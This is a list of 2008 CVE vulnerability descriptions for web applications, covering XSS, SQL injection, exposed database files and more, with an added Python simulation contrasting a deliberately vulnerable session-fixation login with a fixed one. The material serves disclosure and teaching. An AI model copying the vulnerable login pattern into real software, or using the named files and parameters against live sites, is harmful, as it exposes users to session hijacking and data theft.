[CVE-2008-5854] Multiple cross-site scripting (XSS) vulnerabilities in login.php in myPHPscripts Login Session 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ls_user and (2) ls_email parameters (aka the User form) in an ls_register action. NOTE: some of these details are obtained from third party information.
[CVE-2008-5853] Chilek Content Management System (aka ChiCoMaS) 2.0.4 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to (1) obtain database credentials via a direct request for config.inc or (2) read database backups via a request for a backup/ URI.
[CVE-2008-5852] Emefa Guestbook 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for guestbook.mdb.
[CVE-2008-5845] Multiple cross-site scripting (XSS) vulnerabilities in Six Apart Movable Type (MT) before 4.23 allow remote attackers to inject arbitrary web script or HTML via a (1) MTEntryAuthorUsername, (2) MTAuthorDisplayName, (3) MTEntryAuthorDisplayName, or (4) MTCommenterName field in a Profile View template.
[CVE-2008-5842] Multiple cross-site scripting (XSS) vulnerabilities in Fujitsu-Siemens WebTransactions 7.0, 7.1, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via vectors associated with (1) a demo application shipped with WebTransactions and possibly (2) an unspecified "dynamic application."
[CVE-2008-5825] The SmartPoster implementation on the Nokia 6131 Near Field Communication (NFC) phone with 05.12 firmware does not properly display the URI record when the Title record contains a certain combination of space, CR (aka \r), and . (dot) characters, which allows remote attackers to trick a user into loading an arbitrary URI via a crafted NDEF tag, as demonstrated by (1) an http: URI for a malicious web site, (2) a tel: URI for a premium-rate telephone number, and (3) an sms: URI that triggers purchase of a ringtone.
[CVE-2008-5821] Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document.
[CVE-2008-5817] Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) password fields in a sign_in action.
[CVE-2008-5814] Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the lack of details, it is unclear whether this is related to CVE-2006-0208.
[CVE-2008-5810] WBPublish (aka WBPublish.exe) in Fujitsu-Siemens WebTransactions 7.0, 7.1, and possibly other versions allows remote attackers to execute arbitrary commands via shell metacharacters in input that is sent through HTTP and improperly used during temporary session data cleanup, possibly related to (1) directory names, (2) template names, and (3) session IDs.
[CVE-2008-5807] Multiple cross-site scripting (XSS) vulnerabilities in TestLink before 1.8 RC1 allow remote attackers to inject arbitrary web script or HTML via (1) Testproject Names and (2) Testplan Names in planEdit.php, and possibly (3) Testcaseprefixes in projectview.tpl.
[CVE-2008-5799] Cross-site scripting (XSS) vulnerability in the Wir über uns (fsmi_people) extension 0.0.24 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5795] Cross-site scripting (XSS) vulnerability in the eluna Page Comments (eluna_pagecomments) extension 1.1.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5786] Cross-site scripting (XSS) vulnerability in the Silva Find extension 1.1.5 and earlier in Silva 1.x before 1.6.3.2, Silva 2.0 before 2.0.12.2, and Silva 2.1 before 2.1.0.2 allows remote attackers to inject arbitrary web script or HTML via the fulltext parameter.
[CVE-2008-5780] Forest Blog 1.3.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing passwords via a direct request for blog.mdb.
[CVE-2008-5773] Nukedit 4.9.8 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for database/dbsite.mdb.
[CVE-2008-5770] Cross-site scripting (XSS) vulnerability in config/make_config.php in PHP Weather 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2008-5769] Multiple cross-site scripting (XSS) vulnerabilities in Kerio MailServer before 6.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) folder parameter to mailCompose.php or the (2) daytime parameter to calendarEdit.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-5765] WorkSimple 1.2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for data/usr.txt.
[CVE-2008-5762] Simple Text-File Login Script (SiTeFiLo) 1.0.6 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for slog_users.txt.
[CVE-2008-5761] Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS (aka Flatnuke3) 2008-12-11 allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter to the default URI
[CVE-2008-5760] Cross-site scripting (XSS) vulnerability in error413.php in Kerio MailServer before 6.6.2 allows remote attackers to inject arbitrary web script or HTML via the sent parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-5759] Cross-site scripting (XSS) vulnerability in FlatnuX CMS (aka Flatnuke3) 2008-12-11 allows remote attackers to inject arbitrary web script or HTML via the name parameter in an updaterecord action to index.php in the 08_Files module. NOTE: the provenance of this information is unknown
[CVE-2008-5757] Cross-site scripting (XSS) vulnerability in textarea/index.php in Textpattern (aka Txp CMS) 4.0.6 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the Body parameter in an article action. NOTE: some of these details are obtained from third party information.
[CVE-2008-5751] SQL injection vulnerability in index.php in AlstraSoft Web Email Script Enterprise (ESE) allows remote attackers to execute arbitrary SQL commands via the id parameter in a directory action.
[CVE-2008-5742] Multiple open redirect vulnerabilities in AIST NetCat 3.12 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via (1) the redirect parameter in a logoff action to modules/auth/index.php or (2) the url parameter to modules/linkmanager/redirect.php. NOTE: this was reported within an "HTTP Response Splitting" section in the original disclosure.
[CVE-2008-5734] Cross-site scripting (XSS) vulnerability in WebMail Pro in IceWarp Software Merak Mail Server 9.3.2 allows remote attackers to inject arbitrary web script or HTML via an IMG element in an HTML e-mail message.
[CVE-2008-5729] Multiple cross-site scripting (XSS) vulnerabilities in AIST NetCat 3.12 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) form and (2) control parameters to FCKeditor/neditor.php, and the (3) path parameter to admin/siteinfo/iframe.inc.php.
[CVE-2008-5720] Cross-site scripting (XSS) vulnerability in Mayaa before 1.1.23 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving the default error page for the org.seasar.mayaa.impl.engine.PageNotFoundException exception and possibly other exceptions.
[CVE-2008-5719] Cross-site scripting (XSS) vulnerability in Hitachi Groupmax Web Workflow SDK Set for Active Server Pages before 06-52-/C and Hitachi Groupmax Workflow - Development Kit for Active Server Pages before 06-52-/A allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5717] Cross-site scripting (XSS) vulnerability in Hitachi JP1/Integrated Management - Service Support 08-10 through 08-10-05, 08-11 through 08-11-03, and 08-50 through 08-50-03 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5707] SQL injection vulnerability in urunler.asp in Iltaweb Alisveris Sistemi allows remote attackers to execute arbitrary SQL commands via the catno parameter.
[CVE-2008-5682] Cross-site scripting (XSS) vulnerability in Opera before 9.63 allows remote attackers to inject arbitrary web script or HTML via built-in XSLT templates.
[CVE-2008-5679] The HTML parsing engine in Opera before 9.63 allows remote attackers to execute arbitrary code via crafted web pages that trigger an invalid pointer calculation and heap corruption.
[CVE-2008-5678] Fretwell-Downing Informatics (FDI) OLIB7 WebView 2.5.1.1 allows remote authenticated users to obtain sensitive information from files via the infile parameter to the default URI under cgi/, as demonstrated by the (1) get_settings.ini, (2) setup.ini, and (3) text.ini files.
[CVE-2008-5677] Unrestricted file upload vulnerability in Kwalbum 2.0.4, 2.0.2, and earlier, when PICS_PATH is located in the web root, allows remote authenticated users with upload capability to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file under items/, related to the ReplaceBadFilenameChars function in include/ItemAdder.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-5675] Unspecified vulnerability in IBM WebSphere Portal 6.0 before 6.0.1.5 has unknown impact and attack vectors related to "Access problems with BasicAuthTAI."
[CVE-2008-5674] Multiple array index errors in the HTTP server in Darkwet Network webcamXP 3.72.440.0 and earlier and beta 4.05.280 and earlier allow remote attackers to cause a denial of service (device crash) and read portions of memory via (1) an invalid camnum parameter to the pocketpc component and (2) an invalid id parameter to the show_gallery_pic component.
[CVE-2008-5668] Multiple cross-site scripting (XSS) vulnerabilities in Textpattern (aka Txp CMS) 4.0.5 allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to setup/index.php or (2) the name parameter to index.php in the comments preview section.
[CVE-2008-5656] Cross-site scripting (XSS) vulnerability in the frontend plugin for the felogin system extension in TYPO3 4.2.0, 4.2.1 and 4.2.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-5650] SQL injection vulnerability in the login directory in AlstraSoft Web Host Directory allows remote attackers to execute arbitrary SQL commands via the pwd parameter.
[CVE-2008-5644] Cross-site scripting (XSS) vulnerability in the file backend module in TYPO3 4.2.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-5631] SQL injection vulnerability in start.asp in Active eWebquiz 8.0 allows remote attackers to execute arbitrary SQL commands via the (1) useremail parameter (aka username field) or the (2) password parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-5620] RoundCube Webmail (roundcubemail) before 0.2-beta allows remote attackers to cause a denial of service (memory consumption) via crafted size parameters that are used to create a large quota image.
[CVE-2008-5619] html2text.php in Chuggnutt HTML to Text Converter, as used in RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
[CVE-2008-5608] ASP AutoDealer stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for auto.mdb.
[CVE-2008-5606] Gazatem QMail Mailing List Manager 1.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for qmail.mdb.
[CVE-2008-5603] ASPTicker 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for news.mdb.
[CVE-2008-5602] Natterchat 1.12 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for natterchat112.mdb.
[CVE-2008-5601] User Engine Lite ASP stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for users.mdb.
[CVE-2008-5600] Merlix Teamworx Server stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for teamworx.mdb.
[CVE-2008-5597] Cold BBS stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for db/cforum.mdb.
[CVE-2008-5596] Ikon AdManager 2.1 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for ikonBAnner_AdManager.mdb.
[CVE-2008-5592] Nightfall Personal Diary 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for users-zza21.mdb.
[CVE-2008-5591] Cross-site scripting (XSS) vulnerability in login.asp in Nightfall Personal Diary 1.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter and possibly other "login fields." NOTE: some of these details are obtained from third party information.
[CVE-2008-5584] Multiple cross-site scripting (XSS) vulnerabilities in ProjectPier 0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) a message, (2) a milestone, or (3) a display name in a profile, or the (4) a or (5) c parameter to index.php.
[CVE-2008-5575] Session fixation vulnerability in Pro Clan Manager 0.4.2 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
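The session fixation entries in this list (xt:Commerce XTCsid, BLUEPAGE CMS, Social ImpressCMS and Pro Clan Manager PHPSESSID) share one root cause: the application adopts a session identifier that arrived in the request and keeps using it after the user authenticates. The following simulation is an added example, not code from vulscan or from any of the products listed; the SessionStore class, the two login handlers and the scenario names are assumptions made for the demonstration. It goes one step beyond the entries: it also shows that refusing unknown client-supplied IDs is not a fix on its own, because an attacker can first obtain a server-issued ID and plant that. Only issuing a fresh ID at login (PHP's session_regenerate_id(true)) closes the hole.

```python
"""Session fixation, simulated: vulnerable (ID kept across login) vs fixed
(ID regenerated at authentication). Added example; store and handlers are
hypothetical, not any listed product's code."""

import secrets


class SessionStore:
    """Minimal server-side session table keyed by session ID."""

    def __init__(self, adopt_client_ids: bool):
        # adopt_client_ids=True mirrors PHP with use_only_cookies=0 / trans_sid:
        # an unknown ID arriving in the request (e.g. ?PHPSESSID=...) is adopted.
        self.adopt_client_ids = adopt_client_ids
        self._sessions = {}

    def start(self, request_sid):
        """Resolve the request's session ID to (sid, data), creating one if needed."""
        if request_sid in self._sessions:
            return request_sid, self._sessions[request_sid]
        if self.adopt_client_ids and request_sid:
            sid = request_sid                     # the vulnerable behaviour
        else:
            sid = secrets.token_hex(16)           # server picks the ID
        self._sessions[sid] = {}
        return sid, self._sessions[sid]

    def regenerate(self, old_sid):
        """Like session_regenerate_id(true): move data to a fresh ID, drop the old one."""
        data = self._sessions.pop(old_sid)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def user_for(self, sid):
        return self._sessions.get(sid, {}).get("user")


def login_vulnerable(store, request_sid, username):
    """Authenticates but keeps whatever session ID the request arrived with."""
    sid, data = store.start(request_sid)
    data["user"] = username
    return sid


def login_fixed(store, request_sid, username):
    """Authenticates and issues a new ID at that moment, so a planted ID dies."""
    sid, _ = store.start(request_sid)
    sid = store.regenerate(sid)
    _, data = store.start(sid)
    data["user"] = username
    return sid


def fixation_attack(store, login, planted_sid):
    """Victim follows a link carrying planted_sid and logs in; the attacker then
    presents planted_sid. Returns who the server now believes the attacker is."""
    login(store, planted_sid, "victim")
    return store.user_for(planted_sid)


def run_scenarios():
    """Four constructed scenarios; values are the user seen by the attacker."""
    results = {}
    # 1. The listed CVEs: attacker invents an ID and the server adopts it.
    results["invented-id/adopting-server"] = fixation_attack(
        SessionStore(adopt_client_ids=True), login_vulnerable, "attacker-chosen")
    # 2. Server refuses unknown IDs: an invented ID no longer works...
    results["invented-id/strict-server"] = fixation_attack(
        SessionStore(adopt_client_ids=False), login_vulnerable, "attacker-chosen")
    # 3. ...but the attacker can obtain a server-issued ID first and plant that.
    store = SessionStore(adopt_client_ids=False)
    issued, _ = store.start(None)
    results["issued-id/no-regenerate"] = fixation_attack(store, login_vulnerable, issued)
    # 4. Regenerating the ID at login defeats the planted server-issued ID too.
    store = SessionStore(adopt_client_ids=False)
    issued, _ = store.start(None)
    results["issued-id/regenerate"] = fixation_attack(store, login_fixed, issued)
    return results


if __name__ == "__main__":
    for name, seen_as in run_scenarios().items():
        print(f"{name:32} attacker is treated as: {seen_as}")
```

Scenario 3 is the one most often missed in remediation: setting use_only_cookies only removes the URL-parameter vector, while the cookie itself can still be planted (for example from a sibling subdomain), so the regeneration in login_fixed is the control to test for.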
[CVE-2008-5574] SQL injection vulnerability in member.php in Webmaster Marketplace allows remote attackers to execute arbitrary SQL commands via the u parameter.
[CVE-2008-5572] Professional Download Assistant 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for database/downloads.mdb.
[CVE-2008-5569] Multiple cross-site scripting (XSS) vulnerabilities in PHPepperShop 1.4 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php or (2) shop/kontakt.php, or (3) shop_kunden_mgmt.php or (4) SHOP_KONFIGURATION.php in shop/Admin/.
[CVE-2008-5566] Cross-site scripting (XSS) vulnerability in index.php in Triangle Solutions PHP Multiple Newsletters 2.7 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2008-5562] ASPPortal stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for xportal.mdb.
[CVE-2008-5560] PostEcards stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for postcards.mdb.
[CVE-2008-5556] ** DISPUTED ** The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not recognize attack patterns designed to operate against web pages that are encoded with utf-7, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting crafted utf-7 content. NOTE: the vendor reportedly disputes this issue, stating "Behaviour is by design."
[CVE-2008-5550] Open redirect vulnerability in console/faces/jsp/login/BeginLogin.jsp in Sun Java Web Console 3.0.2 through 3.0.5 and Solaris 10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the redirect_url parameter.
[CVE-2008-5549] Unspecified vulnerability in the Sun Java Web Console components in Sun Java System Portal Server 7.1 and 7.2 allows remote attackers to access local files and read the product's configuration information via unknown vectors related to "access to secure files by ThemeServlet."
[CVE-2008-5540] Secure Computing Secure Web Gateway (aka Webwasher), when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
[CVE-2008-5526] DrWeb Anti-virus 4.44.0.09170, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
[CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet).
[CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
[CVE-2008-5487] Cross-site scripting (XSS) vulnerability in admin.php in TurnkeyForms Text Link Sales allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-5462] Unspecified vulnerability in the WebLogic Portal component in BEA Product Suite 10.3, 10.2, 10.0 MP1, 9.2 MP3, and 8.1 SP6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2008-5461] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0, and SP7 allows remote attackers to affect confidentiality, integrity, and availability, related to WLS. NOTE: the previous information was obtained from the January 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is cross-site scripting.
[CVE-2008-5460] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote attackers to affect confidentiality via unknown vectors.
[CVE-2008-5459] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality via unknown vectors.
[CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2008-5435] Cross-site scripting (XSS) vulnerability in moderate.php in PunBB before 1.3.1 allows remote attackers to inject arbitrary web script or HTML via a topic subject.
[CVE-2008-5433] Cross-site scripting (XSS) vulnerability in login.php in PunBB 1.3 and 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the password field.
[CVE-2008-5432] Cross-site scripting (XSS) vulnerability in Moodle before 1.6.8, 1.7 before 1.7.6, 1.8 before 1.8.7, and 1.9 before 1.9.3 allows remote attackers to inject arbitrary web script or HTML via a Wiki page name (aka page title).
[CVE-2008-5421] The SSL web administration service in NetWin SmsGate 1.1n and earlier allows remote attackers to cause a denial of service (hang) via (1) a large integer in the Content-Length HTTP header
[CVE-2008-5414] Unspecified vulnerability in the Feature Pack for Web Services in the Web Services Security component in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 has unknown impact and attack vectors related to "userNameToken."
[CVE-2008-5413] PerfServlet in the PMI/Performance Tools component in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 allows attackers to obtain sensitive information by reading the (1) systemout.log and (2) ffdc files. NOTE: this is probably a duplicate of CVE-2009-0434.
[CVE-2008-5412] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows has unknown impact and attack vectors related to JSPs. NOTE: this is probably a duplicate of CVE-2009-0438.
[CVE-2008-5411] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 sends SSL traffic over "unsecured TCP," which makes it easier for remote attackers to obtain sensitive information by sniffing the network.
[CVE-2008-5399] Cross-site scripting (XSS) vulnerability in the listonlineusers (aka "Who's online") component in mvnForum before 1.2.1 GA allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2008-5365] SQL injection vulnerability in VoteHistory.asp in ActiveWebSoftwares ActiveVotes 2.2 allows remote attackers to execute arbitrary SQL commands via the AccountID parameter.
[CVE-2008-5344] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier
[CVE-2008-5343] Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier
[CVE-2008-5342] Unspecified vulnerability in the BasicService for Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier
[CVE-2008-5341] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier, and JDK and JRE 5.0 Update 16 and earlier, allows untrusted JWS applications to obtain the pathname of the JWS cache and the application username via unknown vectors, aka CR 6727071.
[CVE-2008-5340] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier
[CVE-2008-5339] Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier
[CVE-2008-5338] Cross-site scripting (XSS) vulnerability in info.php in Bandwebsite (aka Bandsite portal system) 1.5 allows remote attackers to inject arbitrary web script or HTML via the section parameter.
[CVE-2008-5337] SQL injection vulnerability in lyrics.php in Bandwebsite (aka Bandsite portal system) 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-5336] SQL injection vulnerability in index.php in WebStudio CMS allows remote attackers to execute arbitrary SQL commands via the pageid parameter.
[CVE-2008-5329] ClearQuest Web in IBM Rational ClearQuest MultiSite before 7.1 allows remote servers to direct a client's submissions and changes to an arbitrary database by specifying multiple comma-separated server identifiers on the JTLRMIREGISTRYSERVERS line in a jtl.properties file.
[CVE-2008-5325] Multiple cross-site scripting (XSS) vulnerabilities in CQ Web in IBM Rational ClearQuest 7.0.0 before 7.0.0.4 and 7.0.1 before 7.0.1.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5324] Multiple cross-site scripting (XSS) vulnerabilities in CQ Web in IBM Rational ClearQuest 2007 before 2007D and 2008 before 2008B allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5323] Cross-site scripting (XSS) vulnerability in index.php in Wysi Wiki Wyg 1.0 allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2008-5304] Cross-site scripting (XSS) vulnerability in TWiki before 4.2.4 allows remote attackers to inject arbitrary web script or HTML via the %URLPARAM{}% variable.
[CVE-2008-5294] SQL injection vulnerability in index.php in WebStudio eCatalogue allows remote attackers to execute arbitrary SQL commands via the pageid parameter.
[CVE-2008-5293] SQL injection vulnerability in index.php in WebStudio eHotel allows remote attackers to execute arbitrary SQL commands via the pageid parameter.
[CVE-2008-5290] Cross-site scripting (XSS) vulnerability in full_txt.php in Werner Hilversum Clean CMS 1.5 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-5284] The web server in IEA Software RadiusNT and RadiusX 5.1.38 and other versions before 5.1.44, Emerald 5.0.49 and other versions before 5.0.52, Air Marshal 2.0.4 and other versions before 2.0.8, and Radius test client (aka Radlogin) 4.0.20 and earlier, allows remote attackers to cause a denial of service (crash) via an HTTP Content-Length header with a negative value, which triggers a single byte overwrite of memory using a NULL terminator. NOTE: some of these details are obtained from third party information.
[CVE-2008-5282] Multiple stack-based buffer overflows in W3C Amaya Web Browser 10.0.1 allow remote attackers to execute arbitrary code via (1) a link with a long HREF attribute, and (2) a DIV tag with a long id attribute.
[CVE-2008-5278] Cross-site scripting (XSS) vulnerability in the self_link function in the RSS Feed Generator (wp-includes/feed.php) for WordPress before 2.6.5 allows remote attackers to inject arbitrary web script or HTML via the Host header (HTTP_HOST variable).
[CVE-2008-5271] Cross-site scripting (XSS) vulnerability in index.php in Fred Stuurman SyndeoCMS 2.6.0 allows remote attackers to inject arbitrary web script or HTML via the section parameter.
[CVE-2008-5264] Cross-site scripting (XSS) vulnerability in searcher.exe in Tornado Knowledge Retrieval System 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the p parameter in a root action.
[CVE-2008-5259] Integer signedness error in DivX Web Player 1.4.2.7, and possibly earlier versions, allows remote attackers to execute arbitrary code via a DivX file containing a crafted Stream Format (STRF) chunk, which triggers a heap-based buffer overflow.
[CVE-2008-5257] webseald in WebSEAL 6.0.0.17 in IBM Tivoli Access Manager for e-business allows remote attackers to cause a denial of service (crash or hang) via HTTP requests, as demonstrated by a McAfee vulnerability scan.
[CVE-2008-5250] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.6.11, 1.12.x before 1.12.2, and 1.13.x before 1.13.3, when Internet Explorer is used and uploads are enabled, or an SVG scripting browser is used and SVG uploads are enabled, allows remote authenticated users to inject arbitrary web script or HTML by editing a wiki page.
[CVE-2008-5249] Cross-site scripting (XSS) vulnerability in MediaWiki 1.13.0 through 1.13.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5228] Cross-site scripting (XSS) vulnerability in IBM Workplace Content Management (WCM) 6.0G and 6.1 before CF8, when a Page Navigation Component shows menu entries, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in the URI, related to parameters "not being encoded."
[CVE-2008-5225] Multiple cross-site scripting (XSS) vulnerabilities in Xerox DocuShare 6 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under (1) SearchResults/ and (2) Services/ in dsdn/dsweb/, and (3) the default URI under unspecified docushare/dsweb/ServicesLib/Group-#/ directories.
[CVE-2008-5224] Cross-site scripting (XSS) vulnerability in Kent Web Mart 1.61 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5218] ScriptsEz FREEze Greetings 1.0 stores pwd.txt under the web root with insufficient access control, which allows remote attackers to obtain cleartext passwords.
[CVE-2008-5214] Cross-site scripting (XSS) vulnerability in service/calendrier.php in ClanLite 2.2006.05.20 allows remote attackers to inject arbitrary web script or HTML via the annee parameter.
[CVE-2008-5211] Cross-site scripting (XSS) vulnerability in search.php in Sphider 1.3.4, when the search suggestion feature is enabled, allows remote attackers to inject arbitrary web script or HTML via the query parameter, a different vector than CVE-2006-2506.
[CVE-2008-5205] Cross-site scripting (XSS) vulnerability in edit.php in wellyblog allows remote attackers to inject arbitrary web script or HTML via the articleid parameter in an add action.
[CVE-2008-5203] Cross-site scripting (XSS) vulnerability in external_vote.php in PowerAward 1.1.0 RC1 allows remote attackers to inject arbitrary web script or HTML via the l_vote_done parameter.
[CVE-2008-5202] Cross-site scripting (XSS) vulnerability in index.php in OTManager CMS 24a allows remote attackers to inject arbitrary web script or HTML via the conteudo parameter.
[CVE-2008-5200] SQL injection vulnerability in the Xe webtv (com_xewebtv) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php.
[CVE-2008-5193] Cross-site scripting (XSS) vulnerability in search.asp in W1L3D4 Philboard 1.14 and 1.2 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. NOTE: this might overlap CVE-2007-4024.
[CVE-2008-5186] ** DISPUTED ** The set_language_path function in geshi.php in Generic Syntax Highlighter (GeSHi) before 1.0.8.1 might allow remote attackers to conduct file inclusion attacks via crafted inputs that influence the default language path ($path variable). NOTE: this issue has been disputed by a vendor, stating that only a static value is used, so this is not a vulnerability in GeSHi. Separate CVE identifiers would be created for web applications that integrate GeSHi in a way that allows control of the default language path.
[CVE-2008-5174] SQL injection vulnerability in joke.php in Jokes Complete Website 2.1.3 allows remote attackers to execute arbitrary SQL commands via the jokeid parameter.
[CVE-2008-5172] Multiple cross-site scripting (XSS) vulnerabilities in Yazd Forum Software 3.x allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to (a) search.jsp, and the (2) msg parameter to (b) error.jsp and (c) userAccount.jsp. NOTE: the provenance of this information is unknown
[CVE-2008-5170] SQL injection vulnerability in item.php in Cheats Complete Website 1.1.1 allows remote attackers to execute arbitrary SQL commands via the itemid parameter.
[CVE-2008-5169] SQL injection vulnerability in drinks/drink.php in Drinks Complete Website 2.1.0 allows remote attackers to execute arbitrary SQL commands via the drinkid parameter.
[CVE-2008-5168] SQL injection vulnerability in tip.php in Tips Complete Website 1.2.0 allows remote attackers to execute arbitrary SQL commands via the tipid parameter.
[CVE-2008-5166] SQL injection vulnerability in riddle.php in Riddles Website 1.2.1 allows remote attackers to execute arbitrary SQL commands via the riddleid parameter.
